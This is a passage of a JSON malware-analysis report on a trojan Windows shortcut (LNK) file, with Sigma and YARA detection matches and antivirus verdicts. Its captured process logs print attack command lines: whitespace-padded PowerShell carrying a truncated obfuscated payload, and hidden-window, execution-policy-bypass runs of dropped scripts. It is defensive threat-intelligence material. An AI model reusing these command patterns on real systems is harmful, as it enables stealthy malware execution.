                    "rule_level": "high",
                    "rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Uncommon Svchost Command Line Parameter",
                    "rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
                    "rule_author": "Liran Ravich",
                    "match_context": [
                        {
                            "values": {
                                "CommandLine": "%WINDIR%\\system32\\svchost.exe",
                                "Image": "C:\\Windows\\system32\\svchost.exe",
                                "EventID": "1"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "high",
                    "rule_id": "fe226328e3589518f77bd1ce4b456e119e55dde2c461f9c95e33b4e2a9f4373d",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Suspicious LNK Command-Line Padding with Whitespace Characters",
                    "rule_description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.\n",
                    "rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
                    "match_context": [
                        {
                            "values": {
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
                                "Description": "Windows PowerShell",
                                "FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
                                "ParentCommandLine": "C:\\Windows\\Explorer.EXE",
                                "CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"                                                                                                                                                                                                                                                                                                                          \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29  [TRUNCATED]",
                                "EventID": "1",
                                "ParentImage": "C:\\Windows\\explorer.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "Description": "Windows PowerShell",
                                "EventID": "1",
                                "ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
                                "CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"                                                                                                                                                                                                                                                                                                                          \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29  [TRUNCATED]",
                                "FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "medium",
                    "rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Change PowerShell Policies to an Insecure Level",
                    "rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
                    "rule_author": "frack113",
                    "match_context": [
                        {
                            "values": {
                                "Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "Description": "Windows PowerShell",
                                "EventID": "1",
                                "ParentCommandLine": "C:\\Windows\\Explorer.EXE",
                                "CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"                                                                                                                                                                                                                                                                                                                          \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29  [TRUNCATED]",
                                "FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
                                "ParentImage": "C:\\Windows\\explorer.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
                                "Description": "Windows PowerShell",
                                "FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
                                "ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
                                "CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"                                                                                                                                                                                                                                                                                                                          \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29  [TRUNCATED]",
                                "EventID": "1",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "Description": "Windows PowerShell",
                                "FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
                                "ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"                                                                                                                                                                                                                                                                                                                          \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29  [TRUNCATED]",
                                "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
                                "EventID": "1",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
                                "Description": "Windows PowerShell",
                                "FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
                                "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
                                "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1 ",
                                "EventID": "1",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 37 112 155 150 130 103 29 57 104 104 96 121 107 29 37 165 172 167 169 170 236 157 25 236 74 61 236 151 176 173 236 50 57 234 184 176 236 79 68 234 28 156 236 73 57 162 89 104 43 107 146 177 105 85 88 29 25 173 152 176 167 100 29 25 171 170 174 89 89 87 94 171 170 174 154 101 40 107 162 179 92 93 170 102 107 108 115  [TRUNCATED]",
                                "Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "EventID": "1"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "medium",
                    "rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Suspicious PowerShell WindowStyle Option",
                    "rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden.\n",
                    "rule_author": "frack113, Tim Shelton (fp AWS)",
                    "match_context": [
                        {
                            "values": {
                                "ScriptBlockText": "44 181 174 104 98 34 43 106 116 100 93 158 29 21 89 179 149 165 104 26 33 97 105 100 152 172 84 109 171 177 105 85 88 29 25 158 116 96 96 157 27 89 158 101 94 90 98 44 42 89 98 161 165 164 54 24 91 108 115 143 146 76 26 106 116 96 100 136 48 25 108 130 92 87 99 35 38 165 177 96 87 93 39 40 106 97 135 101 163 104 94 91 112 96 90 89 40 25 94 99 87 154 102 40 33 104 98 161 165 164 54 24 91 108 115 143 146 76 26 106 116 96 100 136 48 25 108 130 92 87 99 35 38 165 177 106 89 92 33 100 164 166 94 104  [TRUNCATED]",
                                "Path": "",
                                "ScriptBlockId": "5270ac1b-a402-4e29-ba1a-084344b94a5b",
                                "MessageTotal": "2",
                                "MessageNumber": "2",
                                "EventID": "4104"
                            }
                        },
                        {
                            "values": {
                                "ScriptBlockText": "44 109 160 128 93 100 138 48 26 100 114 128 104 90 30 36 95 110 149 118 88 48 27 89 168 128 87 93 46 40 90 98 176 89 93 26 40 91 98 104 100 96 37 109 160 148 94 98 87 36 40 95 97 132 96 89 29 109 171 168 130 90 124 31 30 103 108 100 100 172 100 72 85 112 109 84 88 40 30 95 133 97 93 99 46 20 173 147 87 89 107 30 26 173 168 138 96 96 44 109 169 112 107 100 170 113 96 118 108 98 101 93 26 58 89 92 100 100 172 73 36 105 113 107 91 145 113 109 123 112 99 90 86 44 96 132 97 107 92 172 100 61 108 97 1 [TRUNCATED]",
                                "MessageTotal": "2",
                                "ScriptBlockId": "24b4d14e-f544-4227-854e-2ed763e30605",
                                "Path": "",
                                "MessageNumber": "2",
                                "EventID": "4104"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "medium",
                    "rule_id": "b39586c79bf4d0d43c937efa6129ebb6f0b2cf03b7038a3a8234f84c147600f7",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Dynamic .NET Compilation Via Csc.EXE",
                    "rule_description": "Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.",
                    "rule_author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)",
                    "match_context": [
                        {
                            "values": {
                                "Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "csc.exe",
                                "Product": "Microsoft\\xae .NET Framework",
                                "Description": "Visual C# Command Line Compiler",
                                "EventID": "1",
                                "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
                                "CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\flwg3nkw\\flwg3nkw.cmdline\"",
                                "FileVersion": "4.8.4084.0 built by: NET48REL1",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\<USER>\\AppData\\Local\\Temp\\i3ogpj35\\i3ogpj35.cmdline",
                                "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
                                "EventID": "1"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "low",
                    "rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Non Interactive PowerShell Process Spawned",
                    "rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
                    "rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
                    "match_context": [
                        {
                            "values": {
                                "Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "Description": "Windows PowerShell",
                                "FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
                                "ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
                                "CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"                                                                                                                                                                                                                                                                                                                          \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29  [TRUNCATED]",
                                "EventID": "1",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
                                "Description": "Windows PowerShell",
                                "FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
                                "ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"                                                                                                                                                                                                                                                                                                                          \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29  [TRUNCATED]",
                                "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
                                "EventID": "1",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
                                "Description": "Windows PowerShell",
                                "FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
                                "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
                                "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1 ",
                                "EventID": "1",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 37 112 155 150 130 103 29 57 104 104 96 121 107 29 37 165 172 167 169 170 236 157 25 236 74 61 236 151 176 173 236 50 57 234 184 176 236 79 68 234 28 156 236 73 57 162 89 104 43 107 146 177 105 85 88 29 25 173 152 176 167 100 29 25 171 170 174 89 89 87 94 171 170 174 154 101 40 107 162 179 92 93 170 102 107 108 115  [TRUNCATED]",
                                "Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "EventID": "1"
                            }
                        },
                        {
                            "values": {
                                "CommandLine": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\<USER>\\AppData\\Roaming\\firefox.ps1",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "EventID": "1"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "low",
                    "rule_id": "764276dba9654bf07d000fa390ae98de360ac172927cf3ef64f2db6c5b9be3b2",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Dynamic CSharp Compile Artefact",
                    "rule_description": "When C# is compiled dynamically, a .cmdline file will be created as part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution.\n",
                    "rule_author": "frack113",
                    "match_context": [
                        {
                            "values": {
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "EventID": "11",
                                "TargetFilename": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\flwg3nkw\\flwg3nkw.cmdline"
                            }
                        },
                        {
                            "values": {
                                "TargetFilename": "C:\\Users\\<USER>\\AppData\\Local\\Temp\\i3ogpj35\\i3ogpj35.cmdline"
                            }
                        },
                        {
                            "values": {
                                "TargetFilename": "%TEMP%\\cbi3m5ep.cmdline"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "low",
                    "rule_id": "7cf0b126730658e7c96da1ae0b63c1bb84154a239ca32c09909963038dfdcacf",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "PowerShell Script Dropped Via PowerShell.EXE",
                    "rule_description": "Detects PowerShell creating a PowerShell file (.ps1). While this behavior is often benign, it can also be a sign of a dropper script trying to achieve persistence.",
                    "rule_author": "frack113",
                    "match_context": [
                        {
                            "values": {
                                "Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
                                "EventID": "11"
                            }
                        },
                        {
                            "values": {
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "EventID": "11",
                                "TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\facebook.ps1"
                            }
                        },
                        {
                            "values": {
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1",
                                "EventID": "11"
                            }
                        }
                    ]
                }
            ],
            "popular_threat_classification": {
                "suggested_threat_label": "trojan.pantera/winlnk",
                "popular_threat_name": [
                    {
                        "count": 8,
                        "value": "pantera"
                    },
                    {
                        "count": 3,
                        "value": "winlnk"
                    },
                    {
                        "count": 2,
                        "value": "lnkexec"
                    }
                ],
                "popular_threat_category": [
                    {
                        "count": 19,
                        "value": "trojan"
                    },
                    {
                        "count": 2,
                        "value": "downloader"
                    }
                ]
            },
            "sigma_analysis_summary": {
                "Joe Security Rule Set (GitHub)": {
                    "critical": 0,
                    "high": 1,
                    "medium": 0,
                    "low": 0
                },
                "Sigma Integrated Rule Set (GitHub)": {
                    "critical": 0,
                    "high": 3,
                    "medium": 3,
                    "low": 3
                }
            },
            "last_analysis_date": 1776239516,
            "crowdsourced_yara_results": [
                {
                    "ruleset_id": "002bb473a9",
                    "ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
                    "ruleset_name": "LNK_Ruleset",
                    "rule_name": "PS_in_LNK",
                    "match_date": 1776239919,
                    "description": "Identifies PowerShell artefacts in shortcut (LNK) files.",
                    "author": "@bartblaze",
                    "source": "https://github.com/bartblaze/Yara-rules"
                },
                {
                    "ruleset_id": "002bb473a9",
                    "ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
                    "ruleset_name": "LNK_Ruleset",
                    "rule_name": "Large_filesize_LNK",
                    "match_date": 1776239919,
                    "description": "Identifies shortcut (LNK) files larger than 100 KB. Most goodware LNK files are smaller than 100 KB.",
                    "author": "@bartblaze",
                    "source": "https://github.com/bartblaze/Yara-rules"
                },
                {
                    "ruleset_id": "000a2489bd",
                    "ruleset_version": "000a2489bd|48401e01afaf50f369a7c99eab393389320c7380",
                    "ruleset_name": "expl_lnk_zdi_can_25373",
                    "rule_name": "EXT_EXPL_ZTH_LNK_EXPLOIT_A",
                    "match_date": 1776239919,
                    "description": "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373.",
                    "author": "Peter Girnus",
                    "source": "https://github.com/Neo23x0/signature-base"
                },
                {
                    "ruleset_id": "000bd045c7",
                    "ruleset_version": "000bd045c7|1d926845269a3ac8de0431da133950390b5cced3",
                    "ruleset_name": "gen_susp_lnk",
                    "rule_name": "SUSP_LNK_Big_Link_File",
                    "match_date": 1776239919,
                    "description": "Detects a suspiciously big LNK file - maybe with embedded content",
                    "author": "Florian Roth (Nextron Systems)",
                    "source": "https://github.com/Neo23x0/signature-base"
                }
            ],
            "unique_sources": 1,
            "last_submission_date": 1774511702,
            "last_analysis_results": {
                "Bkav": {
                    "method": "blacklist",
                    "engine_name": "Bkav",
                    "engine_version": "2.0.0.1",
                    "engine_update": "20260414",
                    "category": "malicious",
                    "result": "LNK.ScriptQH.Trojan"
                },
                "Lionic": {
                    "method": "blacklist",
                    "engine_name": "Lionic",
                    "engine_version": "8.16",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Trojan.WinLNK.Pantera.4!c"
                },
                "Cynet": {
                    "method": "blacklist",
                    "engine_name": "Cynet",
                    "engine_version": "4.0.3.4",
                    "engine_update": "20260414",
                    "category": "malicious",
                    "result": "Malicious (score: 99)"
                },
                "CTX": {
                    "method": "blacklist",
                    "engine_name": "CTX",
                    "engine_version": "2024.8.29.1",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "lnk.trojan.pantera"
                },
                "CAT-QuickHeal": {
                    "method": "blacklist",
                    "engine_name": "CAT-QuickHeal",
                    "engine_version": "22.00",
                    "engine_update": "20260414",
                    "category": "malicious",
                    "result": "cld.lnk.trojan.1776162756"
                },
                "Skyhigh": {
                    "method": "blacklist",
                    "engine_name": "Skyhigh",
                    "engine_version": "v2021.2.0+4045",
                    "engine_update": "20260414",
                    "category": "malicious",
                    "result": "BehavesLike.Trojan.dl"
                },
                "ALYac": {
                    "method": "blacklist",
                    "engine_name": "ALYac",
                    "engine_version": "2.0.0.10",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Trojan.Agent.LNK.Gen"
                },
                "Malwarebytes": {
                    "method": "blacklist",
                    "engine_name": "Malwarebytes",
                    "engine_version": "3.1.0.214",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Sangfor": {
                    "method": "blacklist",
                    "engine_name": "Sangfor",
                    "engine_version": "2.22.3.0",
                    "engine_update": "20260413",
                    "category": "undetected",
                    "result": null
                },
                "K7AntiVirus": {
                    "method": "blacklist",
                    "engine_name": "K7AntiVirus",
                    "engine_version": "14.47.59201",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Trojan ( 0060e1851 )"
                },
                "K7GW": {
                    "method": "blacklist",
                    "engine_name": "K7GW",
                    "engine_version": "14.47.59201",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Trojan ( 0060e1851 )"
                },
                "CrowdStrike": {
                    "method": "blacklist",
                    "engine_name": "CrowdStrike",
                    "engine_version": "1.0",
                    "engine_update": "20251219",
                    "category": "undetected",
                    "result": null
                },
                "Arcabit": {
                    "method": "blacklist",
                    "engine_name": "Arcabit",
                    "engine_version": "2025.0.0.23",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
                },
                "Baidu": {
                    "method": "blacklist",
                    "engine_name": "Baidu",
                    "engine_version": "1.0.0.2",
                    "engine_update": "20190318",
                    "category": "undetected",
                    "result": null
                },
                "VirIT": {
                    "method": "blacklist",
                    "engine_name": "VirIT",
                    "engine_version": "9.5.1186",
                    "engine_update": "20260414",
                    "category": "undetected",
                    "result": null
                },
                "Symantec": {
                    "method": "blacklist",
                    "engine_name": "Symantec",
                    "engine_version": "1.22.0.0",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "CL.Downloader!gen211"
                },
                "ESET-NOD32": {
                    "method": "blacklist",
                    "engine_name": "ESET-NOD32",
                    "engine_version": "18.2.18.0",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "LNK/Kimsuky.AA trojan"
                },
                "TrendMicro-HouseCall": {
                    "method": "blacklist",
                    "engine_name": "TrendMicro-HouseCall",
                    "engine_version": "24.550.0.1002",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "HEUR_LNKEXEC.A"
                },
                "ClamAV": {
                    "method": "blacklist",
                    "engine_name": "ClamAV",
                    "engine_version": "1.5.2.0",
                    "engine_update": "20260414",
                    "category": "undetected",
                    "result": null
                },
                "Kaspersky": {
                    "method": "blacklist",
                    "engine_name": "Kaspersky",
                    "engine_version": "22.0.1.28",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "HEUR:Trojan.WinLNK.Agent.gen"
                },
                "BitDefender": {
                    "method": "blacklist",
                    "engine_name": "BitDefender",
                    "engine_version": "7.2",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
                },
                "NANO-Antivirus": {
                    "method": "blacklist",
                    "engine_name": "NANO-Antivirus",
                    "engine_version": "1.0.170.26895",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "SUPERAntiSpyware": {
                    "method": "blacklist",
                    "engine_name": "SUPERAntiSpyware",
